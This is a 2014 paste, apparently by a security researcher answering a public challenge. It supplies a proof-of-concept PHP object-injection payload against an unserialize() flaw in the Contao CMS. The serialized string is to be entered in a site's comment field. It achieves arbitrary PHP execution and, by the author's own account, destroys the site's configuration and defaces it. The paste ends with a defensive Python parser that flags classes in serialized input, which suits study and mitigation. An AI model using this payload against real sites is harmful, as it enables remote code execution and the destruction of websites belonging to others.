Untitled

a guest
Feb 7th, 2014
In http://seclists.org/fulldisclosure/2014/Feb/47 Egidio Romano is unhappy that I doubted his PHP exploitation skillz on Twitter and continues to claim that the Contao unserialize() vulnerability is not exploitable. He challenges me to provide a POC for it.

Well, I know best how painful it can be to go on stage and claim something is not exploitable and be proven wrong by someone smarter than me. However, he asked for it.

Enter the following string, e.g. in the comment field of a Contao site as you see at http://demo.contao.org/en/news/james-wilson-returns.html, and achieve arbitrary PHP code execution. PLEASE DO NOT TRY ON THE DEMO SITE, BECAUSE A) I DO NOT KNOW IF IT ALREADY RUNS THE FIXED VERSION AND B) IN CASE YOU SUCCEED THE EXPLOIT DESTROYS THE CONFIGURATION OF THE SITE AND FULLY DEFACES IT.

O:13:"Contao\Config":3:{S:8:"\\000*\\000Files";O:16:"Contao\Files\Php":0:{}S:9:"\\000*\\000strTop";s:24:"<?php phpinfo();die();?>";S:16:"\\000*\\000blnIsModified";b:1;}

So long...
@i0n1c
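The root cause of the paste above is that unserialize() instantiates whatever class an `O:` entry names. As an added example (not from the paste, and not Contao's code), here is a small Python walker over the PHP serialization grammar (N, b, i, d, s, S with `\xx` hex escapes, a, O) that lists every class a payload would instantiate, so a comment field or request body can be rejected or logged before it ever reaches unserialize(); the sample payload is constructed for this example.

```python
# Constructed sample (not the paste's payload): an object nested inside an array,
# with a protected property whose key uses the S: form's \00 escapes for NUL.
SAMPLE = b'a:1:{s:7:"comment";O:13:"Contao\\Config":1:{S:8:"\\00*\\00Files";O:16:"Contao\\Files\\Php":0:{}}}'
def php_object_classes(data: bytes) -> list[str]:
    """Class names unserialize() would instantiate for data, in order of appearance."""
    classes, pos = [], 0
    def take(ch: bytes) -> None:  # consume one expected delimiter byte
        nonlocal pos
        if data[pos:pos + 1] != ch:
            raise ValueError(f"expected {ch!r} at offset {pos}")
        pos += 1
    def until(ch: bytes) -> bytes:  # bytes up to ch, consuming ch
        nonlocal pos
        end = data.index(ch, pos)
        tok, pos = data[pos:end], end + 1
        return tok
    def string(escaped: bool) -> bytes:  # len:"bytes"; the S: form carries \xx hex escapes
        nonlocal pos
        length, out = int(until(b":")), bytearray()
        take(b'"')
        while len(out) < length:
            if escaped and data[pos:pos + 1] == b"\\":  # \00 = NUL, as in "\0*\0prop" keys
                out.append(int(data[pos + 1:pos + 3], 16)); pos += 3
            else:
                out += data[pos:pos + 1]; pos += 1
        take(b'"')
        return bytes(out)
    def members(count: int) -> None:  # {key;value;...} of an array or object
        take(b"{")
        for _ in range(count):
            value(); value()
        take(b"}")
    def value() -> None:
        nonlocal pos
        tag, pos = data[pos:pos + 1], pos + 1
        if tag == b"N":
            take(b";"); return
        take(b":")
        if tag in (b"b", b"i", b"d"):
            until(b";")
        elif tag in (b"s", b"S"):
            string(tag == b"S"); take(b";")
        elif tag == b"a":
            members(int(until(b":")))
        elif tag == b"O":  # O:len:"Class":n:{...} -- the entry a defender wants to flag
            classes.append(string(False).decode()); take(b":")
            members(int(until(b":")))
        else:
            raise ValueError(f"unknown tag {tag!r} at offset {pos - 1}")
    value()
    return classes
```

On PHP 7.0 or later the same effect is available natively with `unserialize($data, ['allowed_classes' => false])`, and the better fix is to not pass untrusted data to unserialize() at all.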